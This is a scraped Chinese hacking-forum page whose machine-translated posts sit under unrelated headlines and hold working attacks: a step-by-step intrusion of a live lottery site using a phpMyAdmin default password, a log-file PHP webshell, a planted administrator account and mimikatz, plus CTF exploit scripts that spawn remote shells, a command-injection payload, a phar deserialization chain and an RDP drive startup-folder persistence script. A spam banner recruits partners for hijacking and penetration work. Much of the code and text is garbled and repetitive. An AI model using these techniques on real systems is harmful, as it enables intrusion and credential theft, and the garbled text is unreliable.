诚邀seo站长，短信，劫持，渗透，代理，推广团队，博主，主播，各种资源流量大佬合作共赢【站外广告】

Linux Kali高级学习教程

介绍Linux KALI的使用方法和各种系统工具的下载方法。

粉丝

排序方法

LINUX KALI Psobf - PowerShell 混淆器
LINUX KALI Psobf - PowerShell 混淆器

风尘剑心, 1月23日1月23日
- 0 篇回复
- 279 次查看
风尘剑心

1月23日1月23日
KALI怎么渗透网站的？这篇文章告诉你！
KALI怎么渗透网站的？这篇文章告诉你！

RenX6, 2022年11月22日2年前
- 0 篇回复
- 3.7k 次查看
RenX6

2022年11月22日2年前
MSF
MSF

flower X, 2022年11月18日2年前
- 0 篇回复
- 360 次查看
flower X

2022年11月18日2年前
MSF免杀
MSF免杀

flower X, 2022年11月18日2年前
- msf
- 0 篇回复
- 343 次查看
flower X

2022年11月18日2年前
kali 中使用 apt-get update 签名错误 invalid signature 的处理
kali 中使用 apt-get update 签名错误 invalid signature 的处理

Ken1Ve, 2022年11月4日2年前
- kali故障
- 1 篇回复
- 279 次查看
等烟雨

2022年11月5日2年前
Empire框架指南（一）
Empire框架指南（一）

HACK1949, 2022年11月5日2年前
- 0 篇回复
- 281 次查看
HACK1949

2022年11月5日2年前
Ladon for Kali 2022
Ladon for Kali 2022

Anonymous, 2022年11月4日2年前
- 0 篇回复
- 284 次查看
Anonymous

2022年11月4日2年前
301重定向
301重定向

Ken1Ve, 2022年11月4日2年前
- 0 篇回复
- 265 次查看
Ken1Ve

2022年11月4日2年前
ettercap获取http&https账号和密码
ettercap获取http&https账号和密码

Ken1Ve, 2022年11月4日2年前
- 0 篇回复
- 434 次查看
Ken1Ve

2022年11月4日2年前
wpscan之信息收集
wpscan之信息收集

Ken1Ve, 2022年11月4日2年前
- 0 篇回复
- 335 次查看
Ken1Ve

2022年11月4日2年前
kali更新命令
kali更新命令

Ken1Ve, 2022年11月4日2年前
- 0 篇回复
- 285 次查看
Ken1Ve

2022年11月4日2年前
分享一个在线编辑svg的网站
分享一个在线编辑svg的网站

Ken1Ve, 2022年11月4日2年前
- 0 篇回复
- 276 次查看
Ken1Ve

2022年11月4日2年前
CVE-2018-1270 Remote Code Execution with spring-messaging
CVE-2018-1270 Remote Code Execution with spring-messaging

Ken1Ve, 2022年11月4日2年前
- 0 篇回复
- 239 次查看
Ken1Ve

2022年11月4日2年前
linux常用指令（目录操作）
linux常用指令（目录操作）

Ken1Ve, 2022年11月4日2年前
- 0 篇回复
- 348 次查看
Ken1Ve

2022年11月4日2年前
WINDOWS7五步快速搭建Centos7环境
WINDOWS7五步快速搭建Centos7环境

Ken1Ve, 2022年11月4日2年前
- 0 篇回复
- 279 次查看
Ken1Ve

2022年11月4日2年前
linux下相关操作
linux下相关操作

Ken1Ve, 2022年11月4日2年前
- 0 篇回复
- 248 次查看
Ken1Ve

2022年11月4日2年前
http与https区别和联系
http与https区别和联系

Ken1Ve, 2022年11月4日2年前
- 0 篇回复
- 262 次查看
Ken1Ve

2022年11月4日2年前
Netcat基础
Netcat基础

Ken1Ve, 2022年11月4日2年前
- 0 篇回复
- 301 次查看
Ken1Ve

2022年11月4日2年前
使用mysql自带工具mysqldump进行全库备份以及source命令恢复数据库
使用mysql自带工具mysqldump进行全库备份以及source命令恢复数据库

Ken1Ve, 2022年11月4日2年前
- 0 篇回复
- 263 次查看
Ken1Ve

2022年11月4日2年前
公网IP和内网IP
公网IP和内网IP

Ken1Ve, 2022年11月4日2年前
- 0 篇回复
- 330 次查看
Ken1Ve

2022年11月4日2年前

粉丝

针对 NPM Registry API 的新定时攻击可能会暴露私有包
针对 NPM Registry API 的新定时攻击可能会暴露私有包

游客发布主题帖子在 A Test Forum

Chapter 1 Emergency Response-webshell Check Introduction Target machine account password root xjwebshell 1. The flag flag in the hacker webshell {
- 4月10日4月10日
- 0篇回复
研究人员详细介绍了网络间谍组织 Earth Aughisky 使用的恶意工具
研究人员详细介绍了网络间谍组织 Earth Aughisky 使用的恶意工具

游客发布主题帖子在 A Test Forum

Get phpmyadmin weak password The ip of the lottery site is xxx through information, and the detection scan reveals that phpmyadmin exists. Through guessing, use the default weak password (root/root) to log in to phpmyadmin. Write shell to log file through phpmyadmin background sql query Use phpmyadmin's SQL query function to write a sentence Trojan to the log file. The process and command are as follows : 1. Turn on the log function: set global general_log=on; 2. Click the phpmyadmin variable to view the log file name : The log file here is test.php. 3. Execute SQL command and write a sentence to the log file : SELECT'?php assert($_POST['test']);'; 4. Return after successful execution. 5. View log files. 6. Add the user by connecting the kitchen knife and upload mimikatz. Use kitchen knife to connect to log file Trojan, xxx/test.php password :test Check and find that it is the system administrator system permission, just add the user and add it to the management group. The command is : C:\Windows\system32\net.exe user Test Test!@#123 /add C:\Windows\system32\net.exe localgroup administrators Test /add Upload mimikataz to the server. 7. 3389 connection and read the administrator password. (1) Direct telnet ip 3389 test found that it is accessible, so I directly connected 3389 to enter. (2) Or the following command is executed on the kitchen knife here to query the port open by 3389. Step 1 : tasklist /svc | findstr TermService query the process of remote desktop service Step 2 : netstat -ano | findstr **** //Check the port number corresponding to the remote desktop service process number. (3) Execute mimikatz and read the administrator group login password. (4) Use the obtained administrator/xxxx account password to log in to the server remotely. It was found that the server used phpmystudy to build a lottery station in batches. There were about a dozen sites, and they could access the website domain names on several servers at will. Some screenshots are as follows : System 1 : System 2 : System : Backstage 1 : Backstage 2 : Reprinted from the original link: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247487003idx=1sn=5c85b34ce6ffb400fdf858737e34df3dchksm=ce67a482f9102d9405e838f34479dc8d1c6b793d3b6d4f40d9b3cec9cc87f14555d865cb3ddcscene=21#wechat_redirect https://blog.csdn.net/weixin_39997829/article/details/109186917
- 4月10日4月10日
- 0篇回复
新报告揭示了 Emotet 在近期攻击中使用的传递和规避技术
新报告揭示了 Emotet 在近期攻击中使用的传递和规避技术

游客发布主题帖子在 A Test Forum

Preliminary Competition web_ezcms swagger leaked test/test test account login, /sys/user/** has not done authentication, you can add a super administrator user, roleId is still unknown at this time. And the role module is not unauthorized. Continue reading the user module and discover the interface There is a roleid leak here, fill in the idfcf34b56-a7a2-4719-9236-867495e74c31 of the admin leaked earlier here GET/sys/user/roles/fcf34b56-a7a2-4719-9236-867495e74c31 At this time, I know that the super administrator id is 11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9, add the user { 'createWhere':0, 'deptId':'1', 'email':'', 'password':'123456', 'phone':'11111111111', 'roleIds':[ '11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9' ], 'sex':'fmale', 'username':'hacker' } Password field decoding failed, then check the log with the test account and found the key of aes: AbCdEfGhIjKlMnOp, and then the user was added successfully. After we added the user, we found the ping function in the module, but there is waf. Bypass waf and execute the command to get flag POST/sys/pingHTTP/1.1 Host: User-Agent:Mozilla/5.0 (Macintosh; IntelMacOSX10.15; rv:126.0)Gecko/20100101Firefox/126.0 Accept:application/json,text/javascript,*/*;q=0.01 Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding:gzip,deflate Content-Type:application/json;charset=UTF-8 authorization:eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJmY2YzNGI1Ni1hN2EyLTQ3MTktOTIzNi04Njc0OTVlNzRjMzEiLCJqd3Qtcm9sZXMta2V5XyI6WyLotoXnuqfnrqHnkIblkZgiXSwiaXNzIjoieWluZ3h1ZS5jb20iLCJqd3QtcGVybWlzc2lvbnMta2V5IjpbInN5czp1c2VyOmxpc3QiLCJzeXM 6ZGVwdDp1cGRhdGUiLCJzeXM6ZGVwdDpkZXRhaWwiLCJzeXM6dXNlcjpyb2xlOnVwZGF0ZSIsInN5czpwZXJtaXNzaW9uOmFkZCIsInN5czp1c2VyOmFkZCIsInN5czp1c2VyOmFkZCIsInN5czp1c2VyOmRlbGV0ZWQiLCJzeXM6cGVybWlzc2lvbjp1cGRhdGUiLCJzeXM6dXNlcjpkZXRhaWwiLCJzeXM6ZGVwdDpkZWxldGVkIiwic3lzOn JvbGU6dXBkYXRlIiwic3lzOnJvbGU6ZGV0YWlsIiwic3lzOmRlcHQ6bGlzdCIsInN5czpkZXB0OmFkZCIsInN5czp1c2VyOnVwZGF0ZSIsInN5czpyb2xlOmxpc3QiLCJzeXM6cm9sZTpkZWxldGVkIiwic3lzOnBlcm1pc3Npb246bGlzdCIsInN5czpwZXJtaXNzaW9uOmRldGFpbCIsInN5czpwZXJtaXNzaW9uOmRldGFpbCIsInN5czpwZXJtaXNzaW9uO mRlbGV0ZWQiLCJzeXM6bG9nOmRlbGV0ZWQiLCJzeXM6dXNlcjpyb2xlOmRldGFpbCIsInN5czpyb2xlOmFkZCIsInN5czpsb2c6bGlzdCJdLCJqd3QtdXNlci1uYW1lLWtleSI6ImFkbWluIiwiZXhwIjoxNzE2NzE3MjIwLCJpYXQiOjE3MTY3MTAwMjB9.9wcw8M2Ky0lFTbD2B7YaAmPKTl_EO0kJCB5J3bw8FkA X-Requested-With:XMLHttpRequest Content-Length:28 Origin: DNT:1 Sec-GPC:1 Connection:close Referer: Cookie:JSESSIONID=C701D746DA63E8FB94270AD6D2FD9ADB Sec-Fetch-Dest:empty Sec-Fetch-Mode:cors Sec-Fetch-Site:same-origin Priority:u=1 {'ip':'10.10.10.10-1||cat/flag'} Top Secret File-Code P importcv2 importnumpyasnp s=179093209181929149953346613617854206675976823277412565868079070299728290913658 fromCrypto.Util.numberimport* #p,q=(241627603783727624224706687817893681267, #347432454257893250496407965506777649463) ##assertp**2+q**2==s ##print(isPrime(p),isPrime(q)) #Img_path='flag_enc.png' #Img=cv2.imread(Img_path) #print(Img.shape) fromympy.solvers.diophantine.diophantineimportcornacchia ''' This place needs to be modified, decomposed from s, and just factordb f={7247215681561944590028089613581484765881:1,157606014243244438240601:1,5801674693:1,2:1,13513:1} ''' x1=cornacchia(1,1,s) fora,binx1: asserta**2+b**2==s ifisPrime(a)andisPrime(b): print(a,b) #I got p and q here fromCrypto.Util.numberimport* p,q=302951519846417861008714825074296492447,295488723650623654106370451762393175957 s=179093209181929149953346613617854206675976823277412565868079070299728290913658 assertisPrime(p)andisPrime(q)andp**2+q**2==s importcv2 path1='flag_enc.png' img=cv2.imread(path1) #print(img.shape) r,c,d=img.shape print(r,c) #i,j=101,201 fromtqdmimporttqdm a,b=p,q foriintqdm(range(r)): forjinrange(c): set1=set() set1.add((i,j)) i1,j1=i,j whileTrue: x=(i1+b*j1)%r y=((a*i1)+(a*b+1)*j1)%c i1,j1=x,y if(x,y)notinset1: set1.add((x,y)) else: ifi==0andj==0: Continue continue assertlen(set1)==190# are all default 190 #We found that it was 190 here. It was a coincidence that we just started to touch it later. #s1=s%190 #print(s1) #importnumpyasnp #defarnold(img,shuffle_times,a,b): #r,c,d=img.shape #p=np.zeros(img.shape,np.uint8) #print(r,c,d,shuffle_times) #forsinrange(shuffle_times): #foriinrange(r): #forjinrange(c): #x=(i+b*j)%r #y=((a*i)+(a*b+1)*j)%c #p[x,y,]=img[i,j,] #img=np.copy(p) #returnp #x1=arnold(img,11,p,q) #cv2.imwrite('flag3.png',x1) ##cv2.imwrite('flag1.png',img) # c=179093209181929149953346613617854206675976823277412565868079070299728290913658 p,q=302951519846417861008714825074296492447,295488723650623654106370451762393175957 importcv2 importnumpyasnp defarnold(img,shuffle_times,a,b): r,c,d=img.shape p=np.zeros(img.shape,np.uint8) print(r,c,d,shuffle_times) forsinrange(shuffle_times): foriinrange(r): forjinrange(c): x=(i+b*j)%r y=((a*i)+(a*b+1)*j)%c p[x,y,]=img[i,j,] img=np.copy(p) return img=cv2.imread('flag_enc.png') #print(img) c1=c%190 foriinrange(190): img=arnold(img,1,p,q) cv2.imwrite(f'flag{i+1}.png',img) ''' 1. Just enumerate violently. Anyway, the cycle is 190, just enumerate it all. When you find i=66, flag67.png is flag 2.flag{Ailuropoda_rnelanoleuca} ''' Persist in doing the right thing The data retrieved from the traffic packet is a hexadecimal system of an image Check his hexadecimal system and find that there is an additional data at the end of him It is a vim drawing command, install DrawIt directly, enter the command to draw the map GAME Play the game directly and get flag This is a real sign-in FunIoT gives a set of docker files, run a binary file on it, open the reverse directly, then combine dynamic debugging and static analysis to analyze the protocol format, and finally use one of the functions of reading files, and use //bypass comparison detection: Then read the flag: frommpwnimport* importzlib #p=remote('127.0.0.1',6768) p=remote('173.34.20.10',6768) header=b'FunIoT'#6 cmd=0x102 cmd_encode=int(cmd).to_bytes(2,'big') len=0x0101 length=int(len).to_bytes(2,'big') #content=b'getInfo:shadow' #content=b'getInfo:/lib/udev/rc_keymaps/asus_pc39.toml' content=b'getInfo://flag' content=content.ljust(0x101,b'\x00') check_sum=int(zlib.crc32(content)).to_bytes(4,'big') full_content=header+length+cmd_encode+check_sum+content #packet: #header:6bytes #length:2bytes #cmd:2bytes #checksum:4bytes #content:unknow context.log_level='debug' p.send(full_content) #p.interactive() importbase64 print(base64.b64decode(p.recv()).decode('utf-8')) #command:getInfo,setInfo,secret guess_hack The question requires inputting a maximum value and a minimum value, and then guessing the random number in this range. If you guess correctly, you will enter a stack overflow. The number of overflow characters is the number of times you guessed wrong, so you can enter two adjacent numbers, and then guess mistakes enough times, and then perform regular stack overflow utilization. Because the stack can be executed, and the detection requires that the payload is not empty, I directly wrote shellcode and performed a little XOR bypassed non-empty detection: #random%(max-min+1)+min frommpwnimport* context.log_level='debug' #p=process('./main') p=remote('173.34.20.233',9999) p.sendlineafter(b'ch:',b'1') p.sendlineafter(b'Enteraminimumandmaximumnumberfortheguessinggame:',b'12') foriinrange(99): p.sendlineafter(b'Guessanumber',b'1') p.sendlineafter(b'Guessanumberbetween',b'2') payload=b'a'*0x3c payload+=p32(0x0805dea9) payload+=asm(''' push0xffffffff4 popeax push0xffffffffffff popepx xoreax,ebx push0xff978cd0 popecx xorecx,ebx pushecx push0x6e69622f movebx,esp xorecx,ecx int0x80''') payload=payload.ljust(99,b'a') pause() p.sendlineafter(b'Congratulations!',payload) p.interactive() msg The stack overflow + format string vulnerability in the dictionary in the dictionary, which exploits the format string vulnerability to leak to canary and libc, and then the overflow return address is one gadget: frommpwnimport* #p=process('./main') p=remote('173.34.20.68',9999) p.sendlineafter(b'message:',b'%11$p') canary=int(p.recv(18),16) success(f'canary:{hex(canary)}') p.sendlineafter(b'message:',b'%3$p') libc=int(p.recv(14),16)-0x10e1f2 success(f'libc:{hex(libc)}') one=libc+0xe3b01 p.sendlineafter(b'message:',b'a'*0x28+p64(canary)+b'b'*8+p64(one)) pause() p.sendlineafter(b'message:',b'\x00'*0x10) p.interactive() stackover is also a classic stack overflow, but remote libc is a bit different from local. In addition, the return address is returned through leaf esp, [ecx-4], ret, which has not been successfully used. However, after controlling the program to various output places, it is determined that the stack environment is basically the same, so in the end, try not to rely on libc to utilize: frommpwnimport* #context.log_level='debug' #p=process('./stackover') p=remote(b'173.34.20.46',9999) p.sendafter(b'read:',b'a'*0x29b) p.recvuntil(b'a'*0x29b) canary=u32(b'\x00'+p.recv(3)) success(f'canary:{hex(canary)}') #pause() p.sendafter(b'read:',b'a'*(0x29b+7+8+0x2c-0x30-4)) p.recvuntil(b'a'*(0x29b+7+8+0x2c-0x30-4)) p.recv(4) p.recv(4) stack=u32(p.recv(4)) success(f'stack:{hex(stack)}') #pause() p.sendafter(b'read:',b'b'*(0x29b+0x18+7)) p.recvuntil(b'b'*(0x29b+0x18+7)) libc=u32(p.recv(4))-0x1aed5 success(f'libc:{hex(libc)}') #pause() p.sendafter(b'read:',b'a'*(0x29b+7+8+0x2c+0x54)) p.recvuntil(b'a'*(0x29b+7+8+0x2c+0x54)) elf_base=u32(p.recv(4))-0x3fb8 success(f'elf_base:{hex(elf_base)}') payload=b'c'*(0x29a-0x14-8) #execve0xc9510 #system0x41780 #puts0x6dc40 #payload+=p32(libc+0x6dc40) #payload+=p32(elf_base+0x1130) payload+=b'/bin/sh\x00' payload+=p32(elf_base+0x128e) #payload+=p32(elf_base+0x3fcc) #payload+=p32(0) payload+=p32(stack-0x50) payload+=p32(0) #payload+=p32(libc+0x18e363) #payload+=p32(libc+0x18e363) payload+=p32(0) payload+=p32(0) payload+=p32(canary) payload+=p32(0)*3 payload+=p32(stack-0x44) payload+=p32(elf_base+0x3fb8) payload+=b'/bin/sh\x00' pause() context.log_level='debug' p.sendafter(b'read:',payload) p.interactive() stackover-revenge provides addition and subtraction functions within 255. At first, no vulnerability was seen, but later I found that a little backdoor code was added to the normal process of the program: IDA presses F5 and cannot see here. The backdoor code in another place can complete the triggering conditions of the above code:
- 4月10日4月10日
- 1篇回复
英特尔确认 Alder Lake BIOS 源代码泄露
英特尔确认 Alder Lake BIOS 源代码泄露

游客发布主题帖子在 A Test Forum

Morning CTF part web simplelogin yakit burst out the password, remember it should be a123456: pppp index.php has an arbitrary file read: ?php //upload.php error_reporting(0); highlight_file(__FILE__); class A { public $a; public function __destruct() { $s=$this-$a; $s(); } } class B{ public $cmd; function __invoke(){ return $this-start(); } function start(){ echo system($this-cmd); } } if(isset($_GET['file'])) { if(strstr($_GET['file'], 'flag')) { die('Get out!'); } echo file_get_contents($_GET['file']); } ? Read upload.php: !--?php error_reporting(0); if(isset($_FILES['file'])){ mkdir('upload'); $uid=uniqid(); $ext=explode('.',$_FILES['file']['name']); $ext=end($ext); move_uploaded_file($_FILES['file']['tmp_name'],'upload/'.$uuid.'.png'); echo'UploadSuccess!FilePath:upload/'.$uuid.'.png'; }-- The uploaded file will be changed to .png Try uploading the phar file and triggering the deserialization execution command with file_get_contents on the homepage: //phar.php ?php//phar.php classA{ public$a; publicfunction__destruct() { $s=$this-a; $s(); } } classB{ public$cmd; function__construct(){ $this-$cmd='catflag'; } function__invoke(){ return$this-start(); } functionstart(){ system($this-cmd); } } $b=newB(); $b-cmd='cat/flag'; $a=newA(); $a-a=$b; @unlink('phar.phar'); $phar=newPhar('phar.phar');//The suffix must be phar $phar-startBuffering(); $phar-setStub('?php__HALT_COMPILER();');//Set stub $phar-setMetadata($a);//Save custom meta-data into manifest $phar-addFromString('a.txt','abb');//Add the file to be compressed $phar-stopBuffering();//Signature automatically calculates ? Upload and access: misc ftp Traffic extraction zip, and then password is the same password password1234567890 crypto baby_Words on Zen with Buddha aes, but after XOR, the result is converted into characters, so you can turn it back and solve aes ruShiWoWen=[ '无', 'mu', 'monk', 'room', 'art', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser' '未', 'li', 'blin', 'due', 'mul', 'pregnancy', 'san', 'black', 'naked', 'bean', 'special', 'div', 'reach', 'return', 'length', 'length', 'length', 'length', 'length', 'length', 'li', 'written', 'number', 'responsible', 'respect', 'ro', 'respect', 'respect', 'know', 'three', 'bing', 'no', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'Insight', 'thought', 'dream', 'until', 'remove', 'horrible', 'restrained', 'restrained', 'restrained', 'restrained', 'will', 'wisdom', 'old', 'toward', 'roar', 'foot', 'you', 'wang', 'you', 'won', 'mu', 'mu', 'light', 'protect', 'jin', 'harmony', 'going', 'treasure', 'win', 'tong', 'won', 'win', 'tong', 'medicine', 'teacher', 'little', 'living', 'pure', 'deal', 'mountain', 'good', 'pass', 'go', 'seven', 'not', 'come', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'Cause', 'Thousand', 'Five', 'Hundred', 'Ten Thousand', 'Flowers', 'Billions', 'Decision', 'Six', 'Fang', 'Name', 'Name', 'Tong', 'Yue', 'Yun', 'Dian', 'Miracle', 'Zun', 'tree', 'root', 'west', 'soap', 'flame', 'north', 'qing', 'number', 'element', 'improve', 'head', 'lower', 'silence', 'quantity', 'element', 'element', 'four', 'element', 'four', 'element', 'four', 'element', 'four', ' 'Do', 'Shi', 'Ga', 'Mu', 'Ni', 'Le', 'A', 'Du', 'Zhong', 'Yang', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong' 'action', 'in', 'empt', 'empt', 'compassion', 'worry', 'someone', 'satisfaction', 'stable', 'rest', 'day', 'night', 'cultivation', 'hold', 'heart', 'seeking', 'recitation', 'recitation', 'this', 'sutra', 'energy', 'death', 'elimination', 'elimination', 'toxic', 'harm', 'high', 'open', 'text', 'super', 'lift', 'cool', 'as if', 'thought', 'that', 'that', 'emperor', 'vi', 'true', 'ling', 'qian', 'shu', 'ha', 'respect', 'Gift', 'Feng', 'Ancestor', 'First', 'Filial Piety', 'Double', 'My Master', 'Stay', 'My Master', 'Love', 'Brother', 'Brother', 'First', 'Friend', 'Friend', 'Friend', 'Friend', 'Music', 'Zen', 'Clan', 'Home', 'My', 'My', 'Teaching', 'Sun', 'Time', 'Tire', 'Bulse', 'Yin', 'Yin', 'Difficult', 'Economic', 'urgent', 'soft', 'soft', 'shoulder', 'creation', 'soft', 'soft', 'shu', 'shu', 'shu', 'shu', 'creation', 'repet', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', ' 'kill', 'release', 'bridge', 'road', 'cove', 'little', 'draw', 'draw', 'draw', 'sleep', 'sweep', 'sweep', 'sweep', 'sweep', 'sweep', 'don', 'invest', 'invest'] enc='The person who recites the love is guarding the Mengzabao and lying the lying of the lying of the heart, and killing the lying of the heart, and worrying, and reciting the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the dec=b'' for i in enc: dec +=(ruShiWoWen.index(i) ^ 64).to_bytes(1, 'little') KEY=b'DASCTF@Key@^_^@Encode!Buddha!' IV=b'IV|DASCTF|OvO|IV' from Crypto.Cipher import AES from Crypto.Util.Padding import pad, unpad cryptor=AES.new(KEY, AES.MODE_CBC, IV) # padded_data=pad(data.encode('utf-8'), AES.block_size) encrypted_data=cryptor.decrypt(dec) print(encrypted_data) re NormalAndroid When you open jadx, you only call one function in so, ida and look at it in the past: You can see something like a key and transform the key: surface: surface Then enter the encryption logic, which is an AES encryption, and the S box was modified in the past: So I just find a code implemented by AES to modify the S box, and then use the transformed key to decrypt it. Because the network competition was cut off, there was no script stored at that time, so I didn't make it: fromCrypto.Util.numberimportlong_to_bytes,bytes_to_long #https://github.com/bozhu/AES-Python/blob/master/aes.py Sbox=( 0xBE,0xB4,0x9F,0x70,0xDB,0xAD,0x31,0x30,0x6C,0x87, 0x74,0x27,0xC9,0x4C,0x67,0x62,0x0A,0x36,0x08,0xC8, 0x96,0x32,0x00,0xF1,0x38,0x65,0xEC,0xED,0x44,0x25, 0xAA,0x33,0x86,0xEF,0x0D,0x19,0x7D,0xD5,0x45,0xFB, 0x8D,0x61,0xFE,0x50,0x47,0x7E,0x7C,0xF9,0x01,0xDE, 0xFF,0xE1,0xAC,0x5D,0xB5,0x8E,0x48,0xBF,0x90,0x9D, 0x79,0xCB,0xA6,0xA9,0xFC,0x34,0xCF,0x63,0x5A,0x99, 0x98,0xB8,0x92,0x2D,0x02,0x89,0x2C,0x3B,0x15,0x72, 0x5E,0x60,0x29,0x6F,0x0B,0x24,0x6D,0x1C,0x5B,0xE0, 0x37,0xA4,0xCC,0x12,0x93,0xA7,0x09,0xC6,0xB6,0x8F, 0x04,0x20,0xE8,0x46,0xB1,0xAE,0x3A,0x68,0x81,0xCE, 0x2B,0x0C,0xB3,0x3E,0xC0,0x0E,0x4D,0xD8,0xD2,0xA2, 0x9E,0x56,0x28,0xB0,0x35,0x1B,0x5F,0xF5,0x05,0xBC, 0x3C,0x4F,0x8C,0xE6,0xF6,0x75,0xF4,0xF8,0xDD,0x11, 0xC1,0xB9,0x4E,0x97,0xD6,0xF2,0xE4,0xD1,0x82,0xD3, 0x03,0x8B,0x4B,0xCA,0x64,0xEB,0xAB,0x71,0xA1,0xBA, 0xA8,0x6A,0x1E,0x1A,0xA5,0x49,0x6E,0x53,0x66,0x39, 0x51,0xE9,0x26,0xC4,0xDA,0x55,0x3F,0xEA,0x85,0x8A, 0xD9,0x13,0x69,0x1F,0xE2,0x7F,0x2F,0xC5,0x88,0x57, 0x73,0xA3,0xE3,0x0F,0xBB,0x18,0xE5,0x42,0x22,0x52, 0x43,0x80,0x2A,0x6B,0x17,0xD7,0x23,0x06,0x58,0x1D, 0x7A,0x84,0xE7,0xEE,0xD0,0x41,0xD4,0xBD,0xA0,0xC3, 0xC2,0xFD,0x21,0x54,0xDF,0x7B,0xB7,0xF0,0xB2,0x77, 0x3D,0x07,0x78,0x16,0x9C,0x59,0xAF,0x2E,0x83,0xFA, 0x9B,0x95,0xF7,0x40,0x94,0xF3,0xCD,0xC7,0x91,0x10, 0xDC,0x4A,0x14,0x9A,0x5C,0x76 ) InvSbox=[Sbox.index(i)foriinrange(256)] #learntfromhttp://cs.ucsb.edu/~koc/cs178/projects/JT/aes.c xtime=lambdaa:(((a1)^0x1B)0xFF)if(a0x80)else(a1) Rcon=( 0x00,0x01,0x02,0x04,0x08,0x10,0x20,0x40, 0x80,0x1B,0x36,0x6C,0xD8,0xAB,0x4D,0x9A, 0x2F,0x5E,0xBC,0x63,0xC6,0x97,0x35,0x6A, 0xD4,0xB3,0x7D,0xFA,0xEF,0xC5,0x91,0x39, ) deftext2matrix(text): matrix=[] foriinrange(16): byte=(text(8*(15-i)))0xFF ifi%4==0: matrix.append([byte]) else: matrix[i//4].append(byte) returnmatrix defmatrix2text(matrix): text=0 foriinrange(4): forjinrange(4): text|=(matrix[i][j](120-8*(4*i+j))) returntext classAES: def__init__(self,master_key): self.change_key(master_key) defchange_key(self,master_key): self.round_keys=text2matrix(master_key) #printself.round_keys foriinrange(4,4*11): self.round_keys.append([]) ifi%4==0: byte=self.round_keys[i-4][0]\ ^Sbox[self.round_keys[i-1][1]]\ ^Rcon[i//4] self.round_keys[i].append(byte) forjinrange(1,4): byte=self.round_keys[i-4][j]\ ^Sbox[self.round_keys[i-1][(j+1)%4]] self.round_keys[i].append(byte) else: forjinrange(4): byte=self.round_keys[i-4][j]\ ^self.round_keys[i-1][j] self.round_keys[i].append(byte) #printself.round_keys defencrypt(self,plaintext): self.plain_state=text2matrix(plaintext) self.__add_round_key(self.plain_state,self.round_keys[:4]) foriinrange(1,10): self.__round_encrypt(self.plain_state,self.round_keys[4*i:4*(i+1)]) self.__sub_bytes(self.plain_state) self.__shift_rows(self.plain_state) self.__add_round_key(self.plain_state,self.round_keys[40:]) returnmatrix2text(self.plain_state) defdecrypt(self,ciphertext): self.cipher_state=text2matrix(ciphertext) self.__add_round_key(self.cipher_state,self.round_keys[40:]) self.__inv_shift_rows(self.cipher_state) self.__inv_sub_bytes(self.cipher_state) foriinrange(9,0,-1): self.__round_decrypt(self.cipher_state,self.round_keys[4*i:4*(i+1)]) self.__add_round_key(self.cipher_state,self.round_keys[:4]) returnmatrix2text(self.cipher_state) def__add_round_key(self,s,k): foriinrange(4): forjinrange(4): s[i][j]^=k[i][j] def__round_encrypt(self,state_matrix,key_matrix): self.__sub_bytes(state_matrix) self.__shift_rows(state_matrix) self.__mix_columns(state_matrix) self.__add_round_key(state_matrix,key_matrix) def__round_decrypt(
- 4月10日4月10日
- 0篇回复
前端拿到后端长整数数据精度失真问题
前端拿到后端长整数数据精度失真问题

游客发布主题帖子在 A Test Forum

Recently, the administrator in the project got rid of the administrator after rdp was mounted, and thought that he would sort out the use methods for rdp if he had time.: Copying files based on the use of hanging disks is not much. You can decide whether to drag the file or drop the startup item according to the different hanging disks. There are some applications that automatically monitor and copy files, such as: https://github.com/cnucky/DarkGuardianDarkGuardian is a tool used to monitor TSCLIENT (hang disk) after RDP login. When the tool is running in the background, it can automatically obtain the list of files on the hanging disk, download the specified files, copy Trojan files to the startup items on the mounted hard disk, etc. RDPInception This method is relatively useless. The principle is to use the bat script to put it in the server startup item/winlogon execution script, and wait for the administrator to hang up the disk and restart the execution command. @echo off echo Updating Windows. @echo off timeout 1 nul 21 mkdir \\tsclient\c\temp nul 21 mkdir C:\temp nul 21 copy run.bat C:\temp nul 21 copy run.bat \\tsclient\c\temp nul 21 del /q %TEMP%\temp_00.txt nul 21 set dirs=dir /a:d /b /s C:\users\*Startup* set dirs2=dir /a:d /b /s 